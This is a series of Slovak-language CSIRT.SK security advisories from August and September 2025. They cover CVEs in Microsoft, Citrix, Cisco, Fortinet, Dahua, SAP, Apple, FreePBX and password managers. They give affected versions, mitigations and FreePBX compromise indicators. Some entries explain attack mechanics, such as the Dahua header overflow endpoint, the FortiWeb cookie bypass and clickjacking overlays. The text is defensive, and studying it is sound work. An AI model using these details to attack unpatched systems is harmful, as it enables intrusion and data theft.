Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)
Xbox Gaming Services

Opis činnosti:

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka Patch Tuesday 81 zraniteľností vo svojich produktoch, z ktorých 8 označila ako kritické a 72 ako „dôležité“ (Important). Jedna nedostala označenie závažnosti. Kritické zraniteľnosti umožňujú vzdialene vykonávať kód, eskalovať oprávnenia a získať citlivé informácie. Dve zraniteľnosti sú aktívne zneužívané.

CVE-2025-55234 (CVSSv3.1 skóre 8,8)

Vývojári spoločnosti Microsoft opravili aktívne zneužívanú zraniteľnosť v komponente SMB Server, ktorá umožňuje útočníkom eskalovať svoje oprávnenia. Pri istých konfiguračných nastaveniach môžu na to útočníci využiť techniku tzv. relay attack, odchytiť autentifikačné infromácie a zneužiť ich pre neautorizovaný prístup do systému.

CVE-2024-21907 (CVSSv3.1 skóre 7,5)

Druhá opravená zneužívaná zraniteľnosť sa nachádza v knižnici tretej strany Newtonsoft.Json verzií starších ako 13.0.1, ktorá je súčasťou Microsoft SQL Server. Súvisí s nesprávnym spracovaním výnimiek metódou JsonConvert.DeserializeObject. Neautentifikovaný vzdialený útočník môže spôsobiť nedostupnosť služby odoslaním špeciálne upravených dát, ktoré vyvolajú výnimku typu StackOverflow.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu
Eskalácia oprávnení
Nedostupnosť služby (DoS)

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo stránky výrobcu. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac september a Mode „Update Tuesday“. Bližšie informácie nájdete aj tu.

Pre mitigáciu zraniteľnosti CVE-2025-55234 Microsoft odporúča zapnúť SMB Server Signing a SMB Server Extended Protection for Authentication (EPA). To však môže spôsobovať problémy s kompatibilitou voči starším zariadeniam.

Odkazy:

Mesačná správa CSIRT.SK – august 2025

Marian Danko — Wed, 10 Sep 2025 13:16:31 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci august 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 08/2025 PDF (1 904 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Odolali by ste útoku, ktorý zasiahol Jaguar Land Rover?

Marian Danko — Thu, 04 Sep 2025 14:13:59 +0000

Aktuálna situácia:

Automobilová spoločnosť Jaguar Land Rover informovala v oficiálnom vyhlásení, že čelí kybernetickému útoku a podnikla kroky na obnovenie bežnej produkcie. Britské denníky BBC a The Guardian sa o útoku dozvedeli počas jeho priebehu. Cieľom útočníkov bolo vymáhanie peňazí. Podľa aktuálnych informácií nedošlo k úniku dát zákazníkov, ale útok spôsobil pozastavenie viacerých prevádzok. Aktuálne sa k útoku hlási skupina “Scattered Lapsus$ Hunters”, ktorá nebola stotožnená so žiadnou známou APT skupinou.

Prečo je to dôležité:

O útoku informujeme najmä preto, aby sme poukázali na skutočnosť, že zaujímavým cieľom kybernetických útokov nie sú len počítače a smartfóny, ale aj priemyselné zariadenia a SMART spotrebiče ako napríklad inteligentné chladničky, SMART TV, sieťové routery alebo priemyselné systémy SIEMENS či Honeywell. Tieto zariadenia často nemávajú dlhú podporu bezpečnostných aktualizácií, ktoré navyše ich používatelia bežne zabúdajú aplikovať. Často sú nedopatrením alebo zámerne pripojené na internet, čím sa stávajú lákavým cieľom mnohých kybernetických útokov vedúcich k odcudzeniu súkromných či platobných údajov alebo korporátnych tajomstiev. Práve v priemyselnom prostredí sú potom častým vektorom na nasadenie ransomvéru.

Odporúčania:

VJ CSIRT pravidelne informuje administrátorov, ale aj širokú verejnosť pomocou svojho webu o aktuálnych nebezpečných softvérových zraniteľnostiach aj s návodmi na ich mitigáciu. Spravidla sa vždy odporúča využívať aktualizovaný softvér v celej infraštruktúre a strániť sa vystaveniu zariadení na (verejný) internet ak to nie je nevyhnutné. Užitočné rady a návody môžete nájsť aj v našej sekcii Metodiky a návody.

Zdroje:

Zero-day zraniteľnosť vo FreePBX bola opravená

Marian Danko — Thu, 04 Sep 2025 14:06:42 +0000

Bezpečnostní výskumníci zo Sangoma FreePBX Security Team informovali o kritickej zero-day zraniteľnosti v rozšírenom open-source komunikačnom softvéri FreePBX, využívanom najmä v call centrách. Zraniteľnosť bola označená ako aktívne zneužívaná.

Zraniteľné systémy:

FreePBX 15 po verziu 15.0.66
FreePBX 16 po verziu 16.0.89
FreePBX 17 po verziu 17.0.3

Zraniteľnosť sa týka iba systémov s panelom administrátora prístupným z internetu.

Opis zraniteľnosti:

CVE-2025-57819(CVSS 4.0 skóre 10,0)

Zraniteľnosť spočíva v nedostatočnej sanitácii vstupu od používateľa. Neautentifikovaný útočník môže pomocou škodlivého vstupu získať administrátorské oprávnenia. Bližšie informácie o povahe zraniteľnosti ani „proof-of-concept“ nie sú verejne dostupné vzhľadom na jej vysokú závažnosť.

Možné škody:

Neoprávnený prístup k citlivým údajom
Vzdialené vykonávanie kódu
Narušenie dostupnosti, integrity a dôvernosti služby

Odporúčania:

Administrátorom odporúčame bezodkladne vypnúť verejný prístup k administrátorskému panelu z internetu a vykonať aktualizáciu na verzie vyššie alebo rovné:

FreePBX 15 v15.0.66
FreePBX 16 v16.0.89
FreePBX 17 v17.0.3

Podľa vývojárov FreePBX by mali verzie 15 a 16 automaticky spustiť bezpečnostnú aktualizáciu. Pri verzii 17 je možné, že sa táto aktualizácia nespustí automaticky. Pokiaľ využívate FreePBX s koncovým modulom (endpoint module) a máte podozrenie kompromitácie systému, odporúčame okamžité odpojenie od siete.

Indikátory kompromitácie:

Pri podozrení z kompromitácie odporúčame preveriť nasledovné:

Nedávno modifikovaný súbor: /etc/freepbx.conf
Súbor /var/www/html/.clean.sh – nemal by existovať
Podozrivé POST žiadosti na modular.php v Apache web serveri začínajúce okolo dátumu 21.8.2025
Hovory na číslo 9998 v logoch servera Asterisk a CDR nie sú štandardom (pokiaľ neboli nakonfigurované pre konkrétny use-case)
Podozrivé alebo neznáme užívateľské konto v databáze ampuser

Zdroje:

Mesačný prehľad kritických zraniteľností august 2025

Marian Danko — Tue, 02 Sep 2025 10:34:38 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2025.

Mesačný prehľad – 08/2025 PDF (552 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Nové závažné zraniteľnosti Citrix NetScaler môžu byť aktívne zneužívané

Marian Danko — Thu, 28 Aug 2025 10:56:45 +0000

Spoločnosť Citrix opravila jednu kritickú a dve vysoko závažné zraniteľnosti zariadení NetScaler ADC a NetScaler Gateway. Kritická zraniteľnosť je pravdepodobne aktívne zneužívaná.

Zraniteľné systémy:

NetScaler ADC a NetScaler Gateway 14.1 staršie ako 14.1-47.48
NetScaler ADC a NetScaler Gateway 13.1 staršie ako 13.1-59.22
NetScaler ADC 13.1-FIPS a NDcPP  staršie ako 13.1-37.241-FIPS a NDcPP
NetScaler ADC 12.1-FIPS a NDcPP  staršie ako 12.1-55.330-FIPS a NDcPP

Opis činnosti:

Spoločnosť Citrix zverejnila viacero zraniteľností zariadení NetScaler ADC a NetScaler Gateway.

CVE-2025-7775 (CVSS v4.0 skóre 9,2)

Kritická zraniteľnosť súvisí s pretečením pamäte, ktorým je možné docieliť možnosť vzdialene vykonávať kód či spôsobiť nedostupnosť služby. Aby ju bolo možné zneužiť, musí byť splnená aspoň jedna z nasledujúcich podmienok:

NetScaler nakonfigurovaný ako Gateway (virtuálny server VPN, ICA Proxy, CVPN, RDP Proxy)
NetScaler nakonfigurovaný ako virtuálny AAA server
Virtuálny load-balancing server typu HTTP, SSL alebo HTTP_QUIC spojený so službami IPv6 alebo servicegroups viazané na servery IPv6
Virtuálny load-balancing server typu HTTP, SSL alebo HTTP_QUIC spojený s doménovými službami (DBS) IPv6 alebo servicegroups viazané na doménové servery IPv6 (DBS)
NetScaler nakonfigurovaný s virtuálnym serverom pre presmerovanie cache (CR) s HDX

Preveriť konfiguráciu NetScaler je možné v konfiguračnom súbore ns.conf podľa návodu na webe výrobcu v časti „What Customers Should Do“.

Spoločnosť Citrix informovala, že zraniteľnosť pravdepodobne aktívne zneužívajú útočníci.

CVE-2025-7776 (CVSS v4.0 skóre 8,8)

Vysoko závažná zraniteľnosť súvisí s pretečením pamäte, ktoré môže spôsobiť nedostupnosť služby. Pre jej zneužitie musí byť NetScaler nakonfigurovaný ako Gateway (virtuálny server VPN, ICA Proxy, CVPN, RDP Proxy) s naviazaným profilom PCoIP.

Preveriť konfiguráciu NetScaler je možné v konfiguračnom súbore podľa návodu na webe výrobcu v časti „What Customers Should Do“.

CVE-2025-8424 (CVSS v4.0 skóre 8,7)

Vysoko závažná zraniteľnosť súvisí s nesprávnym riadením prístupu v manažmentovému rozhraniu NetScaler. Pre jej zneužitie potrebuje útočník prístup ku NSIP, IP adresu Cluster Management, lokálnu IP adresu stránky GSLB alebo subnetovú IP s manažmentovým prístupom.

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)
Neoprávnený prístup do systému

Odporúčania:

Bezodkladná aktualizácia zraniteľných verzií Citrix NetScaler aspoň na verzie:

NetScaler ADC a NetScaler Gateway 14.1-47.48
NetScaler ADC a NetScaler Gateway 13.1-59.22
NetScaler ADC 13.1-37.241-FIPS a NDcPP
NetScaler ADC 12.1-55.330-FIPS a NDcPP

Vo vzťahu ku zraniteľnosti CVE-2025-8424 odporúča Citrix nasadenie kontroly prístupov IDAM a zakázať lokálnu autentifikáciu. Výrobca odporúča tiež nevystavovať NSIP do internetu.

Odkazy:

Moduly manažérov hesiel pre webové prehliadače sú obeťou clickjackingu

Marian Danko — Mon, 25 Aug 2025 14:08:34 +0000

Bezpečnostný výskumník odhalil zraniteľnosť prídavných modulov pre webové prehliadače viacerých manažérov hesiel, ktorá umožňuje vykonávať clickbaitingové útoky a kradnúť z nich citlivé údaje. Útočníci sa môžu dostať ku prihlasovacím údajom, ale aj platobným či osobným údajom.

Zraniteľné systémy:

Bitwarden 2025.8.0 a staršie
Enpass 6.11.5 a staršie
KeePassXC-Browser 1.9.9.2 a staršie
1Password 8.11.7.2 a staršie
iCloud Passwords 3.1.25
LastPass 4.146.3 a staršie
LogMeOnce 7.12.4 a staršie
Dashlane verzie staršie ako 6.2531.1
Keeper verzie staršie ako 17.2.0
NordPass verzie staršie ako 5.13.24
ProtonPass 1.31.4 a staršie
RoboForm 9.7.5 a staršie

Výskumník testoval iba tieto, no pravdepodobne budú zraniteľné aj mnohé ďalšie manažéry hesiel.

Opis činnosti:

Bezpečnostný výskumník Marek Tóth upozornil na zraniteľnosť viacerých manažérov hesiel voči krádeži kliknutí (tzv. clickbaiting), čo môže viesť k úniku obsahu odomknutých záznamov. Tie môžu okrem prihlasovacích údajov obsahovať aj platobné a osobné dáta. Voči clickbaitingovému útoku sú zraniteľné prídavné moduly manažérov pre internetové prehliadače.

Útočník potrebuje obeť presvedčiť, aby klikla na oznamovacie okno, cez ktoré je preložené neviditeľné okno s potvrdením vloženia údajov z manažéra do útočníkovho formuláru. Pokiaľ prídavný modul nemá definované dostatočne striktné obmedzenia prístupnosti ku svojim súborom a zdrojom pre webové stránky, môže napríklad útočník získať obsah citlivých súborov formou iframe.

Druhá forma útoku zneužíva škodlivý javascript, ktorý zneviditeľní prvky používateľského rozhrania prídavného modulu injektované do rozhrania DOM (document object model) prehliadača.

Útočník môže podvrhnúť neviditeľné menu manažéra hesiel pre výber prihlasovacích údajov na nevinne vyzerajúce potvrdenie o veku používateľa, alebo štandardne vyzerajúcu informáciu o používaní cookies. Nič netušiac, obeť kliknutím na ľubovoľné tlačidlo vyberie a odošle útočníkovi svoje prihlasovacie údaje.

Možné škody:

Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia zraniteľných aplikácií aspoň na:

Bitwarden 2025.8.1
Enpass 6.11.6
Dashlane 6.2531.1
Keeper 17.2.0
NordPass 5.13.24
ProtonPass 1.31.6
RoboForm 9.7.6

Ostatné aplikácie v čase vydania tohto varovania ešte nemajú opravu.

Najefektívnejšou ochranou voči podobným formám útokov je zakázanie automatického dopĺňania (autofill) v nastaveniach modulov, a samozrejme obozretnosť pri výbere navštevovaných webových stránok.

Odkazy:

Aktívne zneužívaná závažná zraniteľnosť Apple iOS, iPadOS a macOS

Marian Danko — Fri, 22 Aug 2025 14:01:53 +0000

Spoločnosť Apple opravila vysoko závažnú aktívne zneužívanú zraniteľnosť v komponente ImageIO systémov macOS, iOS a iPadOS, ktoré umožňuje útočníkom spôsobiť poškodenie pamäte, zneužiteľné na ďalšie fázy útoku. To nastáva pri spracovaní špeciálne upraveného obrázkového súboru.

Zraniteľné systémy:

macOS Ventura, verzie staršie ako 13.7.8
macOS Sequoia, verzie staršie ako 15.6.1
macOS Sonoma, verzie staršie ako 14.7.8
iPadOS, verzie staršie ako 17.7.10
iPadOS, verzie staršie ako 18.6.2
iOS, verzie staršie ako 18.6.2

Opis činnosti:

CVE-2025-43300 (CVSS v3.1 skóre 8,8)

Spoločnosť Apple vydala aktualizácie na opravu zneužívanej zero-day zraniteľnosti CVE-2025-43300 v platforme ImageIO, ktorá súvisí s možnosťou zápisu do pamäte mimo povolené hodnoty. Útočník môže obeti podvrhnúť škodlivý obrázok, ktorého spracovanie spôsobí poškodenie pamäte. To môže štandardne viesť k pádu systému alebo umožniť vzdialené vykonanie kódu.

Zraniteľnosť sa týka produktov iPhone od modelu XS, iPad Pro 10.5-inch, iPad Pro 13-inch, iPad Pro 12.9-inch 2. generácie a novšie, iPad Pro 11-inch od 1. generácie, iPad Air 3. generácie a novšie, iPad od 6. generácie, iPad mini od 5. generácie, a počítače Mac s macOS Ventura, Sequoia a Sonoma.

Útočníci zraniteľnosť zneužívali v cielených sofistikovaných útokoch.

Možné škody:

Nedostupnosť služby (DoS)
Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie:

macOS Ventura 13.7.8
macOS Sequoia 15.6.1
macOS Sonoma 14.7.8
iPadOS 17.7.10
iPadOS 18.6.2
iOS 18.6.2

Odkazy:

Mesačná správa CSIRT.SK – júl 2025

Marian Danko — Thu, 21 Aug 2025 11:24:24 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci júl 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 07/2025 PDF (1 718 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Aktualizácie Windows 11 24H2 môžu spôsobiť nesprávne fungovanie a poškodenie pevného disku

Marian Danko — Thu, 21 Aug 2025 08:52:45 +0000

V aktualizácii programu Defender z augustového balíka Patch Tuesday sa nachádza chyba, ktorá môže spôsobiť chyby na pevných diskoch. Jej najčastejším prejavom je chýbajúci disk v súborovom systéme alebo poškodenie a strata dát. Problém sa podľa viacerých zdrojov prejavuje pri kontinuálnom zápise rádovo desiatok GB.

Problémová aktualizácia:

Windows 11 24H2 – kumulatívny balík aktualizácie KB5063878

Možné škody:

Strata údajov

Odporúčania:

Microsoft zatiaľ nezverejnil definitívnu správu o príčine či mitigácii problému. Odporúčame však všetkým administrátorom a používateľom zasiahnutých systémov aby si pravidelne zálohovali a chránili dáta a sledovali oficiálne stránky výrobcu pre bližšie informácie o riešení možných problémov.

Zdroje:

Kritická zraniteľnosť Cisco Secure Firewall Management Center dovoľuje vykonávať systémové príkazy

Marian Danko — Mon, 18 Aug 2025 14:55:04 +0000

Spoločnosť Cisco opravila kritickú zraniteľnosť v Cisco Secure Firewall Management Center, ktorá z dôvodu nevhodnej validácie používateľských vstupov dovoľuje vzdialenému útočníkovi pri prihlasovaní odoslať požiadavku obsahujúcu príkaz Shell. Ten zraniteľné zariadenie vykoná.

Zraniteľné systémy:

Cisco Secure FMC 7.0.7 a 7.7.0

Aplikácia musí mať povolenú autentifikáciu do manažmentového rozhrania cez RADIUS a/alebo SSH.

Opis zraniteľností:

CVE-2025-20265 (CVSS v3.1 skóre 10,0)

Cisco Secure Firewall Management Center (FMC) obsahuje kritickú zraniteľnosť v komponente pre protokol RADIUS. Zraniteľnosť súvisí s nedostatočnou kontrolou používateľských vstupov pri autentifikácii voči serveru RADIUS. Vzdialenému neautentifikovanému útočníkovi dovoľuje pri prihlasovaní injektovať príkazy Shell do odosielanej požiadavky, ktoré zariadenie vykoná s vysokými oprávneniami.

Zraniteľnosť je aktívna, ak má aplikácia povolenú autentifikáciu do manažmentového rozhrania cez protokol RADIUS a/alebo SSH.

Možné škody:

Vzdialené vykonávanie príkazov

Odporúčania:

Odporúčame bezodkladne aktualizovať zraniteľné inštancie Cisco Secure FMC na najnovšiu verziu.

Ak aktualizácie nie je možná, odporúčame mitigovať zraniteľnosť zakázaním prístupu do manažmentového rozhrania cez protokoly RADIUS a SSH.

Zdroje:

Závažná zraniteľnosť FortiWeb umožňuje obísť autentifikáciu

Marian Danko — Mon, 18 Aug 2025 14:53:47 +0000

Spoločnosť Fortinet opravila vysoko závažnú zraniteľnosť vo svojich zariadeniach FortiWeb, ktorá z dôvodu nevhodnej validácie parametrov v cookies umožňuje vzdialeným útočníkom obísť autentifikáciu a získať administrátorské oprávnenia.

Zraniteľné systémy:

FortiWeb 7.6.0 až 7.6.3
FortiWeb 7.4.0 až 7.4.7
FortiWeb 7.2.0 až 7.2.10
FortiWeb 7.0.0 až 7.0.10

Opis zraniteľností:

CVE-2025-52970 (CVSS v3.1 skóre 7,7)

Vysoko závažná zraniteľnosť FortiWeb spočíva v nesprávnej validácii/spracovaní parametra Era v cookies, čo umožňuje útočníkovi nastaviť tento parameter na neočakávanú hodnotu, čím server použije nulový tajný kľúč pre šifrovanie a HMAC podpisovanie relácie. Neautentifikovaný vzdialený útočník môže poslať špeciálne vytvorenú požiadavku, čím obíde autentifikáciu a získa administrátorské oprávnenia na zraniteľnom zariadení. Na to potrebuje poznať nešpecifikovanú neverejnú informáciu týkajúcu sa cieľového zariadenia a používateľa.

Možné škody:

Obídenie prihlásenia
Eskalácia oprávnení

Odporúčania:

Odporúčame bezodkladne aktualizovať zraniteľné inštancie aspoň na verziu

FortiWeb 7.6.4 alebo novšiu
FortiWeb 7.4.8 alebo novšiu
FortiWeb 7.2.11 alebo novšiu
FortiWeb 7.0.11 alebo novšiu

Zdroje:

Analytici upozorňujú na bezpečnostné kamery DAHUA – majú 2 závažné zraniteľnosti

Marian Danko — Mon, 18 Aug 2025 14:52:28 +0000

Bezpečnostní výskumníci z Bitdefender IoT Research Team zverejnili informácie o zraniteľnostiach CVE-2025-31700 a CVE-2025-31701 vo firmvéri pre bezpečnostné kamery značky Dahua. Ide o závažné zraniteľnosti, ktoré vie útočník zneužiť na vzdialené vykonávanie kódu.

Zraniteľné systémy:

IPC-1XXX Series
IPC-2XXX Series
IPC-WX Series
IPC-ECXX Series
SD3A Series
SD2A Series
SD3D Series
SDT2A Series
SD2C Series
TPC-AEBF5201 Series
TPC-CA Series

Zraniteľné sú všetky verzie vydané pred 16.4.2025.

Opis zraniteľností:

CVE-2025-31700 (CVSS 3.1 skóre 8,1)

Nástroj na spracovanie požiadaviek pre protokol ONVIF na porte 80 nesprávne parsuje hlavičku Host tak, že pri jej kopírovaní nehľadí na veľkosť kópie, ktorá môže byť väčšia ako vyhradený zásobník pamäte. To sa deje v prípade formátu hlavičky obsahujúceho špeciálne znaky, ktoré nástroj na spracovanie požiadaviek nedovoľuje. Neautentifikovaný útočník môže týmto spôsobom zapísať ľubovoľný počet bajtov do zásobníka a získať možnosť vykonávať kód, alebo spôsobiť nedostupnosť služby.

CVE-2025-31701 (CVSS 3.1 skóre 8,1)

Nástroj na spracovanie nezdokumentovaného koncového bodu POST /RPC2_UploadFileWithName/* kopíruje hlavičku Cseq HTTP priamo do sekcie pamäte .bss rovnakou funkciou (strncpy) ako v predchádzajúcej zraniteľnosti. Tým môže neautentifikovaný útočník opäť zapísať ľubovoľný počet bajtov do zásobníka pamäte a získať možnosť vykonávať kód, alebo spôsobiť nedostupnosť služby.

Možné škody:

Vzdialené vykonávanie kódu
Nedostupnosť služby (DoS)
Narušenie integrity a dôveryhodnosti systému
Narušenie bezpečnosti monitorovaného objektu

Odporúčania:

Administrátorom a majiteľom zraniteľných systémov odporúčame vykonať bezpečnostné aktualizácie dostupné na stránkach výrobcu.

Zdroje:

Microsoft v rámci augustového Patch Tuesday opravil viacero kritických a zero-day zraniteľnosť

Marian Danko — Fri, 15 Aug 2025 13:03:06 +0000

Spoločnosť Microsoft vydala v auguste 2025 balík opráv pre portfólio svojich produktov opravujúci 107 zraniteľností, z ktorých 13 je označených ako kritické. Opravená bola aj zero-day zraniteľnosť CVE-2025-53779. Jedná sa o chybu relatívnej cesty vo Windows Kerberos, ktorá umožňuje autorizovanému útočníkovi zvýšiť oprávnenia cez sieť ako súčasť útoku nazvaného BadSuccessor.

Zraniteľné systémy:

Azure File Sync
Azure OpenAI
Azure Portal
Azure Stack
Azure Virtual Machines
Desktop Windows Manager
GitHub Copilot and Visual Studio
Graphics Kernel
Kernel Streaming WOW Thunk Service Driver
Kernel Transaction Manager
Microsoft 365 Copilot’s Business Chat
Microsoft Brokering File System
Microsoft Dynamics 365 (on-premises)
Microsoft Edge for Android
Microsoft Exchange Server
Microsoft Graphics Component
Microsoft Office
Microsoft Office Excel
Microsoft Office PowerPoint
Microsoft Office SharePoint
Microsoft Office Visio
Microsoft Office Word
Microsoft Teams
Remote Access Point-to-Point Protocol (PPP) EAP-TLS
Remote Desktop Server
Role: Windows Hyper-V
SQL Server
Storage Port Driver
Web Deploy
Windows Ancillary Function Driver for WinSock
Windows Cloud Files Mini Filter Driver
Windows Connected Devices Platform Service
Windows DirectX
Windows Distributed Transaction Coordinator
Windows File Explorer
Windows GDI+
Windows Installer
Windows Kerberos
Windows Kernel
Windows Local Security Authority Subsystem Service (LSASS)
Windows Media
Windows Message Queuing
Windows NT OS Kernel
Windows NTFS
Windows NTLM
Windows PrintWorkflowUserSvc
Windows Push Notifications
Windows Remote Desktop Services
Windows Routing and Remote Access Service (RRAS)
Windows Security App
Windows SMB
Windows StateRepository API
Windows Subsystem for Linux
Windows Win32K – GRFX
Windows Win32K – ICOMP

Opis činnosti:

CVE-2025-50165 (CVSS 3.1 skóre 9,8)

Zraniteľnosť operačných systémov Windows súvisí s dereferenciou nedôveryhodného ukazovateľa v komponente Graphics, ktorý môže byť spustený špeciálne vytvoreným grafickým obsahom doručeným cez sieť. Na to môže poslúžiť škodlivý súbor JPEG, ktorý môže byť doručený napríklad v dokumente Office. Útočník môže použiť neinicializovaný ukazovateľ funkcie, ktorý sa volá pri dekódovaní obrázka formátu JPEG. Keď zraniteľný systém spracuje tento obsah – buď automaticky (napr. generovanie náhľadov, obsluha náhľadov) alebo cez interakciu používateľa, zraniteľnosť umožní vykonanie ľubovoľného kódu.

CVE-2025-53766 (CVSS 3.1 skóre 9,8)

Zraniteľnosť vo Windows GDI+ umožňuje neoprávnenému útočníkovi vzdialene vykonať kód po pretečení haldy. Zraniteľnosť sa dá zneužiť otvorením dokumentu obsahujúceho špeciálne vytvorený metafile. Microsoft vylúčil Preview Pane ak vektor útoku. Kritickou ju robí aj fakt, že každé zariadenie prevádzkujúce vlastnú ASP.NET aplikáciu ponúkajúcu nahrávanie súborov bez bezpečnostnej aktualizácie by mohlo byť zraniteľným.

CVE-2025-53779 (CVSS 3.1 skóre 7,2) zero-day

Zraniteľnosť v Kerberos spočíva v možnosti získania prístupu k niektorým atribútom delegovaných spravovaných servisných účtov (dMSA) v Active Directory. To umožní útočníkovi zvýšenie oprávnení na správcu domény. Forma útoku dostala názov BadSuccessor.

Pozn.: Zvyšné zraniteľnosti, ktoré výrobca uvádza ako kritické, nie sú rovnako hodnotené podľa CVSS hodnotenia. Spolu Microsoft v aktuálnom balíku Patch Tuesday opravil 107 zraniteľností.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k informáciám

Odporúčania:

Zdroje:

Mesačný prehľad kritických zraniteľností júl 2025

Marian Danko — Thu, 14 Aug 2025 15:20:30 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci júl 2025.

Mesačný prehľad – 07/2025 PDF (601 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

SAP v augustovom Patch Tuesday opravil viacero kritických a vysoko závažných zraniteľností vo viacerých produktoch

Marian Danko — Thu, 14 Aug 2025 09:07:08 +0000

Spoločnosť SAP vydala 12. augusta 2025 bezpečnostné aktualizácie obsahujúce opravy pre 20 zraniteľností. 3 z nich sú hodnotené ako kritické a umožňujú injektovanie kódu. 2 vysoko závažné dovoľujú získať vyššie oprávnenia, obchádzať autorizáciu a injektovať ABAP kód.
[Aktualizácia] Jedna z nich je aktívne zneužívaná a existuje pre ňu verejne dostupný exploit.

Zraniteľné systémy:

SAP S/4HANA (Private Cloud/On-Premise) verzie S4CORE 102, 103, 104, 105, 106, 107, 108
SAP Landscape Transformation (Analysis Platform) verzie DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020
SAP Business One (SLD) verzie B1_ON_HANA 10.0, SAP-M-BO 10.0
SAP NetWeaver Application Server ABAP (BIC Document) verzie SAP_APPL 606; SAP_FIN 617, 618, 720, 730; S4CORE 102, 103, 104, 105, 106, 107, 108

Pozn.: V ďalších zraniteľných systémoch boli opravené stredne a nízko závažné zraniteľnosti.

Opis zraniteľnosti:

CVE-2025-27429, CVE-2025-42957 (CVSS 3.1 skóre 9,9)

Kritické zraniteľnosti v SAP S/4HANA, ktoré súvisia s nevhodnou kontrolou oprávnení. Zraniteľnosti dovoľujú útočníkom s používateľskými oprávneniami injektovať ľubovoľný ABAP kód cez moduly prístupné na diaľku cez RFC. CVE-2025-27429 predstavuje aktualizáciu pôvodnej zraniteľnosti z apríla 2025.

[Aktualizácia] Zraniteľnosť je aktívne zneužívaná a existuje pre ňu verejne dostupný exploit.

CVE-2025-42950 (CVSS 3.1 skóre 9,9)

Kritická zraniteľnosť v SAP Landscape Transformation (Analysis Platform) súvisí s nevhodnou kontrolou oprávnení. Zraniteľnosť dovoľuje útočníkom s používateľskými oprávneniami injektovať ľubovoľný ABAP kód cez moduly prístupné na diaľku cez RFC.

CVE-2025-42951 (CVSS 3.1 skóre 8,8)

Vysoko závažná zraniteľnosť v SAP Business One (SLD) súvisí z nevhodnou formou autorizácie. Útočník autentifikovaný v natívnom klientovi môže získať prístup k administrátorskému API a získať administrátorské oprávnenia ku databáze.

CVE-2025-42976 (CVSS 3.1 skóre 8,1)

Označuje viacero zraniteľností v SAP NetWeaver Application Server ABAP (BIC Document) súvisiacich s možnosťou čítať pamäť mimo povolené hodnoty. Autentifikovaný útočník môže spôsobiť poškodenie pamäte zaslaním špeciálne vytvorenej požiadavky na BIC Document, čo mu umožní prístup k informáciám v častiach pamäte, ktoré by nemali byť prístupné. Útočník môže požiadavkami služby aj zahltiť a spôsobiť jej výpadok.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia oprávnení
Neoprávnený prístup k citlivým údajom
Nedostupnosť služby (DoS)
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie zo stránky výrobcu. Ak nie je možné aktualizovať zraniteľné systémy, odporúča sa zraniteľné podsystémy deaktivovať.

Zdroje:

Xerox vydal bezpečnostné záplaty pre vysoko závažné zraniteľnosti

Marian Danko — Thu, 14 Aug 2025 09:00:09 +0000

Spoločnosť Xerox vydala urgentné bezpečnostné varovanie týkajúce sa dvoch kritických zraniteľností v softvéri FreeFlow Core. Tieto zraniteľnosti umožňujú útočníkom vykonať útoky Server-Side Request Forgery (SSRF) a vzdialene vykonávať kód.

Zraniteľné systémy:

Xerox FreeFlow Core verzia 8.0.4

Opis zraniteľnosti:

CVE-2025-8355 (CVSS 3.1 skóre 7,5)

Zraniteľnosť súvisí s nesprávnym spracovaním a sanitizáciou externých entít XML (XXE). Útočník môže túto zraniteľnosť zneužiť vytvorením škodlivého XML obsahujúceho interné URL a vykonanie útokov typuServer-Side Request Forgery.

CVE-2025-8356 (CVSS 3.1 skóre 9,8)

Kritická zraniteľnosť typu Path Traversal umožňuje útočníkom pristupovať k súborom mimo určeného rozsahu aplikácie manipuláciou parametrov cesty súborov. Jej zneužitie môže viesť k vzdialenému vykonávaniu kódu.

